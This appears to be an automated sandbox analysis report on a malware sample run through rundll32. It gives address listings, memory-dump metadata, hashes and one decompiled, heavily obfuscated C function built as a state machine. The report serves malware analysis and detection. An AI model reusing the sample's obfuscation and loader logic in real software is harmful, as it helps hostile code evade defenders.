                                                                                                                      0x003461ee
                                                                                                                      0x003461f2
                                                                                                                      0x003461fa
                                                                                                                      0x00346202
                                                                                                                      0x00346207
                                                                                                                      0x0034620c
                                                                                                                      0x00346214
                                                                                                                      0x0034621c
                                                                                                                      0x00346226
                                                                                                                      0x0034622a
                                                                                                                      0x00346232
                                                                                                                      0x0034623a
                                                                                                                      0x00346244
                                                                                                                      0x00346248
                                                                                                                      0x00346250
                                                                                                                      0x00346258
                                                                                                                      0x00346260
                                                                                                                      0x00346268
                                                                                                                      0x00346279
                                                                                                                      0x0034627c
                                                                                                                      0x00346280
                                                                                                                      0x00346288
                                                                                                                      0x00346298
                                                                                                                      0x003462a0
                                                                                                                      0x003462a5
                                                                                                                      0x003462ab
                                                                                                                      0x003462b0
                                                                                                                      0x003462b8
                                                                                                                      0x003462c0
                                                                                                                      0x003462cd
                                                                                                                      0x003462d0
                                                                                                                      0x003462d4
                                                                                                                      0x003462dc
                                                                                                                      0x003462e4
                                                                                                                      0x003462ec
                                                                                                                      0x003462f4
                                                                                                                      0x003462fc
                                                                                                                      0x00346304
                                                                                                                      0x00346311
                                                                                                                      0x00346315
                                                                                                                      0x0034631d
                                                                                                                      0x00346325
                                                                                                                      0x0034632d
                                                                                                                      0x00346335
                                                                                                                      0x0034633d
                                                                                                                      0x0034634d
                                                                                                                      0x00346351
                                                                                                                      0x00346359
                                                                                                                      0x00346361
                                                                                                                      0x00346369
                                                                                                                      0x00346375
                                                                                                                      0x0034637a
                                                                                                                      0x00346380
                                                                                                                      0x0034638a
                                                                                                                      0x0034638b
                                                                                                                      0x0034638f
                                                                                                                      0x00346397
                                                                                                                      0x003463a2
                                                                                                                      0x003463ad
                                                                                                                      0x003463b8
                                                                                                                      0x003463c0
                                                                                                                      0x003463c8
                                                                                                                      0x003463cc
                                                                                                                      0x003463d4
                                                                                                                      0x003463dc
                                                                                                                      0x003463e4
                                                                                                                      0x003463e9
                                                                                                                      0x003463f1
                                                                                                                      0x00346405
                                                                                                                      0x0034640c
                                                                                                                      0x00346417
                                                                                                                      0x0034641f
                                                                                                                      0x00346427
                                                                                                                      0x00346434
                                                                                                                      0x00346438
                                                                                                                      0x00346442
                                                                                                                      0x0034644a
                                                                                                                      0x0034644f
                                                                                                                      0x0034645d
                                                                                                                      0x00346462
                                                                                                                      0x00346468
                                                                                                                      0x00346470
                                                                                                                      0x00346478
                                                                                                                      0x00346480
                                                                                                                      0x00346485
                                                                                                                      0x0034648d
                                                                                                                      0x00346498
                                                                                                                      0x003464a3
                                                                                                                      0x003464ae
                                                                                                                      0x003464ba
                                                                                                                      0x003464bf
                                                                                                                      0x003464c5
                                                                                                                      0x003464ca
                                                                                                                      0x003464d2
                                                                                                                      0x003464da
                                                                                                                      0x003464e7
                                                                                                                      0x003464e8
                                                                                                                      0x003464ec
                                                                                                                      0x003464f0
                                                                                                                      0x003464f8
                                                                                                                      0x003464fd
                                                                                                                      0x00346505
                                                                                                                      0x00346512
                                                                                                                      0x00346516
                                                                                                                      0x0034651e
                                                                                                                      0x00346526
                                                                                                                      0x00346531
                                                                                                                      0x0034653c
                                                                                                                      0x00346547
                                                                                                                      0x0034654f
                                                                                                                      0x00346557
                                                                                                                      0x0034655c
                                                                                                                      0x00346561
                                                                                                                      0x00346569
                                                                                                                      0x00346571
                                                                                                                      0x00346576
                                                                                                                      0x0034657e
                                                                                                                      0x00346586
                                                                                                                      0x0034658e
                                                                                                                      0x00346596
                                                                                                                      0x003465a0
                                                                                                                      0x003465a4
                                                                                                                      0x003465ac
                                                                                                                      0x003465ba
                                                                                                                      0x003465be
                                                                                                                      0x003465c2
                                                                                                                      0x003465ca
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x003465d7
                                                                                                                      0x003465d7
                                                                                                                      0x003465d7
                                                                                                                      0x003465d7
                                                                                                                      0x003465dd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003465e3
                                                                                                                      0x0034675c
                                                                                                                      0x00346761
                                                                                                                      0x00346764
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x00000000
                                                                                                                      0x003465d2
                                                                                                                      0x003465e9
                                                                                                                      0x003465ef
                                                                                                                      0x0034670b
                                                                                                                      0x00346714
                                                                                                                      0x00346717
                                                                                                                      0x0034671a
                                                                                                                      0x0034671d
                                                                                                                      0x00346722
                                                                                                                      0x00346727
                                                                                                                      0x00346727
                                                                                                                      0x0034672a
                                                                                                                      0x00346732
                                                                                                                      0x003468c7
                                                                                                                      0x003468cd
                                                                                                                      0x00346738
                                                                                                                      0x00346738
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x00000000
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x003465f5
                                                                                                                      0x003465fb
                                                                                                                      0x003466be
                                                                                                                      0x003466da
                                                                                                                      0x003466fc
                                                                                                                      0x00346701
                                                                                                                      0x00346704
                                                                                                                      0x003468b4
                                                                                                                      0x003468b4
                                                                                                                      0x00000000
                                                                                                                      0x00346601
                                                                                                                      0x00346607
                                                                                                                      0x00346669
                                                                                                                      0x00346676
                                                                                                                      0x0034667b
                                                                                                                      0x00346682
                                                                                                                      0x00346685
                                                                                                                      0x0034668c
                                                                                                                      0x00346691
                                                                                                                      0x00346698
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x00000000
                                                                                                                      0x003465d2
                                                                                                                      0x00346609
                                                                                                                      0x0034660f
                                                                                                                      0x00000000
                                                                                                                      0x00346615
                                                                                                                      0x00346627
                                                                                                                      0x00346637
                                                                                                                      0x00346629
                                                                                                                      0x00346629
                                                                                                                      0x00346629
                                                                                                                      0x0034663c
                                                                                                                      0x00346645
                                                                                                                      0x0034664a
                                                                                                                      0x00000000
                                                                                                                      0x0034664a
                                                                                                                      0x0034660f
                                                                                                                      0x00346607
                                                                                                                      0x003465fb
                                                                                                                      0x003465ef
                                                                                                                      0x003468d4
                                                                                                                      0x003468dd
                                                                                                                      0x003468dd
                                                                                                                      0x00346774
                                                                                                                      0x0034684d
                                                                                                                      0x0034685c
                                                                                                                      0x00346894
                                                                                                                      0x00346899
                                                                                                                      0x0034689e
                                                                                                                      0x003468aa
                                                                                                                      0x003468af
                                                                                                                      0x00000000
                                                                                                                      0x003468a0
                                                                                                                      0x003468a0
                                                                                                                      0x00000000
                                                                                                                      0x003468a0
                                                                                                                      0x0034677a
                                                                                                                      0x00346780
                                                                                                                      0x0034682e
                                                                                                                      0x0034683a
                                                                                                                      0x00346830
                                                                                                                      0x00346832
                                                                                                                      0x00346837
                                                                                                                      0x00346837
                                                                                                                      0x0034683f
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x00000000
                                                                                                                      0x003465d2
                                                                                                                      0x00346786
                                                                                                                      0x0034678c
                                                                                                                      0x003467fb
                                                                                                                      0x00346800
                                                                                                                      0x00346805
                                                                                                                      0x0034680b
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x00000000
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x0034678e
                                                                                                                      0x00346790
                                                                                                                      0x00000000
                                                                                                                      0x00346796
                                                                                                                      0x003467a7
                                                                                                                      0x003467a8
                                                                                                                      0x003467b7
                                                                                                                      0x003467ba
                                                                                                                      0x003467bb
                                                                                                                      0x003467c0
                                                                                                                      0x003467c3
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x00000000
                                                                                                                      0x003465d2
                                                                                                                      0x003465d2
                                                                                                                      0x00346790
                                                                                                                      0x0034678c
                                                                                                                      0x00346780
                                                                                                                      0x00000000
                                                                                                                      0x003468b9
                                                                                                                      0x003468b9
                                                                                                                      0x00000000
                                                                                                                      0x003468c5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )%I$,?D$4`$J<$KE$NU$[w$owF$3)
                                                                                                                      • API String ID: 0-2094660596
                                                                                                                      • Opcode ID: 374c5e616a7febd5da3f0fe83014393f82ecbe67cecfbccc304677ea1f8e64e6
                                                                                                                      • Instruction ID: 5e76fe3fb67616fcccb3c3faeaf28da137e167cbc3ee2df1a726b9c366722137
                                                                                                                      • Opcode Fuzzy Hash: 374c5e616a7febd5da3f0fe83014393f82ecbe67cecfbccc304677ea1f8e64e6
                                                                                                                      • Instruction Fuzzy Hash: 3B224F71508380CFD369CF25C486A9BBBE2FBC5758F10891DF68A8A261D7B19949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 003599AA Relevance: 11.6, Strings: 9, Instructions: 384COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E003599AA() {
				void* _t393;
				signed int _t395;
				signed int _t396;
				signed int _t399;
				signed int _t401;
				signed int _t405;
				signed int _t416;
				void* _t420;
				intOrPtr* _t464;
				signed int _t468;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t485;
				void* _t489;

				 *(_t489 + 0x98) = 0xc8da52;
				 *(_t489 + 0xa0) = 0;
				 *((intOrPtr*)(_t489 + 0x9c)) = 0xe0694f;
				_t420 = 0x1be807e;
				 *(_t489 + 0x30) = 0x503fa2;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) >> 8;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) | 0x613cd221;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) ^ 0x613cd23e;
				 *((intOrPtr*)(_t489 + 0x18)) = 0x638b33;
				 *((intOrPtr*)(_t489 + 0x18)) =  *((intOrPtr*)(_t489 + 0x18)) + 0x7670;
				 *(_t489 + 0xa4) = 0;
				_t471 = 0x25;
				 *(_t489 + 0x2c) =  *(_t489 + 0x28) / _t471;
				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) + 0xfffff8bb;
				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) ^ 0x0002acab;
				 *(_t489 + 0x7c) = 0x85e0fa;
				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) + 0x3665;
				_t472 = 0x78;
				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) / _t472;
				 *(_t489 + 0x7c) =  *(_t489 + 0x7c) ^ 0x00011e0c;
				 *(_t489 + 0x20) = 0x383fb4;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0xbc1f7ed2;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x73642c82;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) >> 0xa;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x003dbfb6;
				 *(_t489 + 0x5c) = 0xbb8564;
				_t473 = 0x44;
				 *(_t489 + 0x5c) =  *(_t489 + 0x5c) / _t473;
				_t474 = 0x6f;
				 *(_t489 + 0x58) =  *(_t489 + 0x5c) * 0x17;
				 *(_t489 + 0x58) =  *(_t489 + 0x58) ^ 0x00393d4f;
				 *(_t489 + 0x14) = 0x7f7e5e;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) + 0xaaec;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) + 0x89a4;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) >> 0xe;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) ^ 0x000cd586;
				 *(_t489 + 0x98) = 0xf466ca;
				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0x21e472eb;
				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0x21177926;
				 *(_t489 + 0x8c) = 0xf41dfa;
				 *(_t489 + 0x8c) =  *(_t489 + 0x8c) << 7;
				 *(_t489 + 0x8c) =  *(_t489 + 0x8c) ^ 0x7a009fd6;
				 *(_t489 + 0x70) = 0x5bd344;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffffa539;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0xd954c9cc;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0xd906e478;
				 *(_t489 + 0x20) = 0x13a841;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) * 0x2b;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x070f8edd;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) / _t474;
				 *(_t489 + 0x20) =  *(_t489 + 0x20) ^ 0x0006f8e9;
				 *(_t489 + 0x38) = 0xfa8d3a;
				 *(_t489 + 0x38) =  *(_t489 + 0x38) + 0xb40d;
				 *(_t489 + 0x38) =  *(_t489 + 0x38) >> 0xd;
				 *(_t489 + 0x38) =  *(_t489 + 0x38) + 0xfffffdcd;
				 *(_t489 + 0x38) =  *(_t489 + 0x38) ^ 0x0000539f;
				 *(_t489 + 0x48) = 0x9c2d9c;
				 *(_t489 + 0x48) =  *(_t489 + 0x48) + 0xffff4328;
				 *(_t489 + 0x48) =  *(_t489 + 0x48) | 0x335ced82;
				 *(_t489 + 0x48) =  *(_t489 + 0x48) ^ 0x33dc9cbe;
				 *(_t489 + 0x80) = 0x96612e;
				_t475 = 0x1b;
				 *(_t489 + 0x84) =  *(_t489 + 0x80) * 6;
				 *(_t489 + 0x84) =  *(_t489 + 0x84) ^ 0x0382c053;
				 *(_t489 + 0x1c) = 0xc28e37;
				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xffffbfaa;
				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xcb4;
				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) + 0xffffb9e8;
				 *(_t489 + 0x1c) =  *(_t489 + 0x1c) ^ 0x00c80396;
				 *(_t489 + 0x34) = 0xb1f5e0;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) / _t475;
				_t476 = 0x71;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) / _t476;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) | 0xfe0fc038;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xfe0a805e;
				 *(_t489 + 0x78) = 0xafc36d;
				 *(_t489 + 0x78) =  *(_t489 + 0x78) >> 0xc;
				_t477 = 0x76;
				 *(_t489 + 0x78) =  *(_t489 + 0x78) / _t477;
				 *(_t489 + 0x78) =  *(_t489 + 0x78) ^ 0x000041ea;
				 *(_t489 + 0x98) = 0x19521f;
				 *(_t489 + 0x98) =  *(_t489 + 0x98) | 0xd8938a8f;
				 *(_t489 + 0x98) =  *(_t489 + 0x98) ^ 0xd896baad;
				 *(_t489 + 0xa0) = 0x8c17;
				 *(_t489 + 0xa0) =  *(_t489 + 0xa0) | 0xdec19f4d;
				 *(_t489 + 0xa0) =  *(_t489 + 0xa0) ^ 0xdec779d8;
				 *(_t489 + 0xa4) = 0xd8bcc0;
				 *(_t489 + 0xa4) =  *(_t489 + 0xa4) | 0xa8247ef5;
				 *(_t489 + 0xa4) =  *(_t489 + 0xa4) ^ 0xa8ff4c77;
				 *(_t489 + 0x28) = 0x29b40a;
				 *(_t489 + 0x28) =  *(_t489 + 0x28) + 0xffff8872;
				 *(_t489 + 0x28) =  *(_t489 + 0x28) ^ 0xb7a5f24a;
				_t478 = 0x4b;
				 *(_t489 + 0x28) =  *(_t489 + 0x28) * 0x6c;
				 *(_t489 + 0x28) =  *(_t489 + 0x28) ^ 0x6f6c7a54;
				 *(_t489 + 0x58) = 0x4b8f45;
				 *(_t489 + 0x58) =  *(_t489 + 0x58) / _t478;
				_t479 = 0x65;
				 *(_t489 + 0x58) =  *(_t489 + 0x58) * 0x3a;
				 *(_t489 + 0x58) =  *(_t489 + 0x58) ^ 0x003d129f;
				 *(_t489 + 0x50) = 0xbe9ee7;
				 *(_t489 + 0x50) =  *(_t489 + 0x50) / _t479;
				_t480 = 0x21;
				 *(_t489 + 0x4c) =  *(_t489 + 0x50) / _t480;
				 *(_t489 + 0x4c) =  *(_t489 + 0x4c) ^ 0x0002cf44;
				 *(_t489 + 0x60) = 0x65600b;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) | 0xec945ebd;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) >> 3;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) ^ 0x1d945acd;
				 *(_t489 + 0x2c) = 0xa0640b;
				 *(_t489 + 0x2c) =  *(_t489 + 0x2c) >> 0xc;
				_t487 =  *(_t489 + 0x80);
				_t481 = 0x18;
				 *(_t489 + 0x30) =  *(_t489 + 0x2c) / _t481;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) + 0xffff1131;
				 *(_t489 + 0x30) =  *(_t489 + 0x30) ^ 0xfffa9798;
				 *(_t489 + 0x88) = 0xf27f7;
				 *(_t489 + 0x88) =  *(_t489 + 0x88) | 0x77366d7c;
				 *(_t489 + 0x88) =  *(_t489 + 0x88) ^ 0x7735274d;
				 *(_t489 + 0x60) = 0x482c82;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) << 3;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) << 6;
				 *(_t489 + 0x60) =  *(_t489 + 0x60) ^ 0x9054890c;
				 *(_t489 + 0x70) = 0x370d16;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffff6d24;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) + 0xffff76cf;
				 *(_t489 + 0x70) =  *(_t489 + 0x70) ^ 0x00352e72;
				 *(_t489 + 0x68) = 0x1def33;
				 *(_t489 + 0x68) =  *(_t489 + 0x68) << 6;
				 *(_t489 + 0x68) =  *(_t489 + 0x68) | 0x037a4cde;
				 *(_t489 + 0x68) =  *(_t489 + 0x68) ^ 0x077b4a65;
				 *(_t489 + 0x6c) = 0xb09c0e;
				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) | 0xdb8bd061;
				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) << 0xb;
				 *(_t489 + 0x6c) =  *(_t489 + 0x6c) ^ 0xdee5f4d6;
				 *(_t489 + 0x54) = 0x47a16a;
				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0x8e9bba09;
				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0x2cf08045;
				 *(_t489 + 0x54) =  *(_t489 + 0x54) ^ 0xa22d7119;
				 *(_t489 + 0x94) = 0xf12a19;
				 *(_t489 + 0x94) =  *(_t489 + 0x94) >> 0xe;
				 *(_t489 + 0x94) =  *(_t489 + 0x94) ^ 0x000f202b;
				 *(_t489 + 0x14) = 0xa6bc3b;
				 *(_t489 + 0x14) =  *(_t489 + 0x14) ^ 0xdd735814;
				_t482 = 0x17;
				_t468 =  *(_t489 + 0x7c);
				 *(_t489 + 0x10) =  *(_t489 + 0x14) / _t482;
				 *(_t489 + 0x10) =  *(_t489 + 0x10) ^ 0xd88d4109;
				 *(_t489 + 0x10) =  *(_t489 + 0x10) ^ 0xd12bee16;
				 *(_t489 + 0x3c) = 0xc5a0fe;
				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) ^ 0x68fedc8a;
				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) + 0xffff2d8b;
				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) << 2;
				 *(_t489 + 0x3c) =  *(_t489 + 0x3c) ^ 0xa0e5a913;
				_t418 =  *(_t489 + 0x7c);
				_t483 =  *(_t489 + 0x7c);
				 *(_t489 + 0x88) = 0x6bfd68;
				 *(_t489 + 0x88) =  *(_t489 + 0x88) + 0xb2a;
				 *(_t489 + 0x88) =  *(_t489 + 0x88) ^ 0x0062c11e;
				 *(_t489 + 0x44) = 0xc29f93;
				 *(_t489 + 0x44) =  *(_t489 + 0x44) >> 3;
				 *(_t489 + 0x44) =  *(_t489 + 0x44) << 1;
				 *(_t489 + 0x44) =  *(_t489 + 0x44) ^ 0x0034c9e7;
				 *(_t489 + 0x34) = 0x1f0cbd;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) + 0x9a3;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0x409d3612;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xb603e22c;
				 *(_t489 + 0x34) =  *(_t489 + 0x34) ^ 0xf682cf9d;
				while(1) {
					L1:
					_t393 = 0x26766da;
					L2:
					while(_t420 != 0x1be807e) {
						if(_t420 == _t393) {
							_t395 = E003457CE( *((intOrPtr*)(_t489 + 0xcc)),  *((intOrPtr*)(_t489 + 0xd0)),  *(_t489 + 0x50), _t418, _t483, _t468, _t420,  *(_t489 + 0x6c),  *(_t489 + 0x60), _t420,  *(_t489 + 0x4c), _t489 + 0xb8, _t420,  *(_t489 + 0x60));
							_t489 = _t489 + 0x30;
							__eflags = _t395;
							if(_t395 == 0) {
								_t396 =  *(_t489 + 0xa4);
							} else {
								_t485 = _t468;
								while(1) {
									__eflags =  *((intOrPtr*)(_t485 + 4)) - 4;
									if( *((intOrPtr*)(_t485 + 4)) != 4) {
										goto L18;
									}
									L17:
									_t349 = _t485 + 0xc; // 0x11e18
									_t401 = E0035FC96( *(_t489 + 0x34),  *(_t489 + 0x8c), _t487,  *(_t489 + 0x60), _t349);
									_t489 = _t489 + 0xc;
									__eflags = _t401;
									if(_t401 == 0) {
										_t396 = 1;
										 *(_t489 + 0xa4) = 1;
									} else {
										goto L18;
									}
									L23:
									_t483 =  *(_t489 + 0x7c);
									goto L24;
									L18:
									_t399 =  *_t485;
									__eflags = _t399;
									if(_t399 == 0) {
										_t396 =  *(_t489 + 0xa4);
									} else {
										_t485 = _t485 + _t399;
										__eflags =  *((intOrPtr*)(_t485 + 4)) - 4;
										if( *((intOrPtr*)(_t485 + 4)) != 4) {
											goto L18;
										}
									}
									goto L23;
								}
							}
							L24:
							__eflags = _t396;
							if(__eflags == 0) {
								_t393 = 0x26766da;
								_t420 = 0x26766da;
								continue;
							} else {
								_t464 =  *0x365208; // 0x0
								E00347519( *(_t489 + 0x70),  *_t464,  *((intOrPtr*)(_t489 + 0x64)));
								_t420 = 0xa9f14cf;
								goto L1;
							}
							L32:
						} else {
							if(_t420 == 0x7d55797) {
								_t334 = _t489 + 0x28; // 0x6f6c7a54
								E003612A8(_t420,  *_t334, __eflags,  *(_t489 + 0x60),  *((intOrPtr*)(_t489 + 0x18)), _t489 + 0xb8);
								_t405 = E00354FA8( *((intOrPtr*)(_t489 + 0xac)), _t489 + 0xc8,  *((intOrPtr*)(_t489 + 0x9c)),  *(_t489 + 0x7c));
								_t487 = _t405;
								_t489 = _t489 + 0x14;
								_t420 = 0xe18b597;
								 *((short*)(_t405 - 2)) = 0;
								while(1) {
									L1:
									_t393 = 0x26766da;
									goto L2;
								}
							} else {
								if(_t420 == 0x9eda0b2) {
									E00354DAD( *(_t489 + 0x44),  *((intOrPtr*)(_t489 + 0x90)), _t418,  *(_t489 + 0x48),  *(_t489 + 0x34));
								} else {
									if(_t420 == 0xa9f14cf) {
										E003468DE( *((intOrPtr*)(_t489 + 0x74)),  *(_t489 + 0x5c),  *(_t489 + 0x98),  *(_t489 + 0x14), _t468);
										_t489 = _t489 + 0xc;
										_t420 = 0x9eda0b2;
										while(1) {
											L1:
											_t393 = 0x26766da;
											goto L2;
										}
									} else {
										if(_t420 == 0xacf19b8) {
											_t483 = 0x1000;
											_push(_t420);
											_push(_t420);
											 *(_t489 + 0x84) = 0x1000;
											_t468 = E00353512(0x1000);
											_t393 = 0x26766da;
											__eflags = _t468;
											_t420 =  !=  ? 0x26766da : 0x9eda0b2;
											continue;
										} else {
											if(_t420 != 0xe18b597) {
												L28:
												__eflags = _t420 - 0x5473740;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												_t416 = E0035E938(0x2000000, 1,  *(_t489 + 0x44),  *(_t489 + 0x58),  *(_t489 + 0x94), _t420,  *(_t489 + 0x5c),  *((intOrPtr*)(_t489 + 0x90)), _t420,  *(_t489 + 0x20),  *(_t489 + 0x2c) | 0x00000006, _t489 + 0xb8);
												_t418 = _t416;
												_t489 = _t489 + 0x28;
												if(_t416 != 0xffffffff) {
													_t420 = 0xacf19b8;
													while(1) {
														L1:
														_t393 = 0x26766da;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
						goto L32;
					}
					_t420 = 0x7d55797;
					goto L28;
				}
			}




























                                                                                                                      0x003599b0
                                                                                                                      0x003599bd
                                                                                                                      0x003599c6
                                                                                                                      0x003599d1
                                                                                                                      0x003599d6
                                                                                                                      0x003599de
                                                                                                                      0x003599e3
                                                                                                                      0x003599eb
                                                                                                                      0x003599f3
                                                                                                                      0x003599fb
                                                                                                                      0x00359a07
                                                                                                                      0x00359a14
                                                                                                                      0x00359a19
                                                                                                                      0x00359a1f
                                                                                                                      0x00359a27
                                                                                                                      0x00359a2f
                                                                                                                      0x00359a37
                                                                                                                      0x00359a43
                                                                                                                      0x00359a48
                                                                                                                      0x00359a4e
                                                                                                                      0x00359a56
                                                                                                                      0x00359a5e
                                                                                                                      0x00359a66
                                                                                                                      0x00359a6e
                                                                                                                      0x00359a73
                                                                                                                      0x00359a7b
                                                                                                                      0x00359a87
                                                                                                                      0x00359a8c
                                                                                                                      0x00359a97
                                                                                                                      0x00359a98
                                                                                                                      0x00359a9c
                                                                                                                      0x00359aa4
                                                                                                                      0x00359aac
                                                                                                                      0x00359ab4
                                                                                                                      0x00359abc
                                                                                                                      0x00359ac1
                                                                                                                      0x00359ac9
                                                                                                                      0x00359ad4
                                                                                                                      0x00359adf
                                                                                                                      0x00359aea
                                                                                                                      0x00359af5
                                                                                                                      0x00359afd
                                                                                                                      0x00359b08
                                                                                                                      0x00359b10
                                                                                                                      0x00359b18
                                                                                                                      0x00359b20
                                                                                                                      0x00359b28
                                                                                                                      0x00359b35
                                                                                                                      0x00359b39
                                                                                                                      0x00359b47
                                                                                                                      0x00359b4b
                                                                                                                      0x00359b53
                                                                                                                      0x00359b5b
                                                                                                                      0x00359b63
                                                                                                                      0x00359b68
                                                                                                                      0x00359b70
                                                                                                                      0x00359b78
                                                                                                                      0x00359b80
                                                                                                                      0x00359b88
                                                                                                                      0x00359b92
                                                                                                                      0x00359b9a
                                                                                                                      0x00359baf
                                                                                                                      0x00359bb2
                                                                                                                      0x00359bb9
                                                                                                                      0x00359bc4
                                                                                                                      0x00359bcc
                                                                                                                      0x00359bd4
                                                                                                                      0x00359bdc
                                                                                                                      0x00359be4
                                                                                                                      0x00359bec
                                                                                                                      0x00359bfc
                                                                                                                      0x00359c04
                                                                                                                      0x00359c09
                                                                                                                      0x00359c0f
                                                                                                                      0x00359c17
                                                                                                                      0x00359c1f
                                                                                                                      0x00359c27
                                                                                                                      0x00359c30
                                                                                                                      0x00359c35
                                                                                                                      0x00359c3b
                                                                                                                      0x00359c43
                                                                                                                      0x00359c4e
                                                                                                                      0x00359c59
                                                                                                                      0x00359c64
                                                                                                                      0x00359c6f
                                                                                                                      0x00359c7a
                                                                                                                      0x00359c85
                                                                                                                      0x00359c90
                                                                                                                      0x00359c9b
                                                                                                                      0x00359ca6
                                                                                                                      0x00359cae
                                                                                                                      0x00359cb6
                                                                                                                      0x00359cc3
                                                                                                                      0x00359cc6
                                                                                                                      0x00359cca
                                                                                                                      0x00359cd2
                                                                                                                      0x00359ce2
                                                                                                                      0x00359ceb
                                                                                                                      0x00359cee
                                                                                                                      0x00359cf2
                                                                                                                      0x00359cfa
                                                                                                                      0x00359d0a
                                                                                                                      0x00359d12
                                                                                                                      0x00359d15
                                                                                                                      0x00359d19
                                                                                                                      0x00359d21
                                                                                                                      0x00359d29
                                                                                                                      0x00359d31
                                                                                                                      0x00359d36
                                                                                                                      0x00359d3e
                                                                                                                      0x00359d46
                                                                                                                      0x00359d53
                                                                                                                      0x00359d5a
                                                                                                                      0x00359d5f
                                                                                                                      0x00359d65
                                                                                                                      0x00359d6d
                                                                                                                      0x00359d75
                                                                                                                      0x00359d80
                                                                                                                      0x00359d8b
                                                                                                                      0x00359d96
                                                                                                                      0x00359d9e
                                                                                                                      0x00359da3
                                                                                                                      0x00359da8
                                                                                                                      0x00359db0
                                                                                                                      0x00359db8
                                                                                                                      0x00359dc0
                                                                                                                      0x00359dc8
                                                                                                                      0x00359dd0
                                                                                                                      0x00359dd8
                                                                                                                      0x00359ddd
                                                                                                                      0x00359de5
                                                                                                                      0x00359ded
                                                                                                                      0x00359df5
                                                                                                                      0x00359dfd
                                                                                                                      0x00359e02
                                                                                                                      0x00359e0a
                                                                                                                      0x00359e12
                                                                                                                      0x00359e1a
                                                                                                                      0x00359e22
                                                                                                                      0x00359e2a
                                                                                                                      0x00359e35
                                                                                                                      0x00359e3d
                                                                                                                      0x00359e48
                                                                                                                      0x00359e50
                                                                                                                      0x00359e5c
                                                                                                                      0x00359e5f
                                                                                                                      0x00359e63
                                                                                                                      0x00359e67
                                                                                                                      0x00359e6f
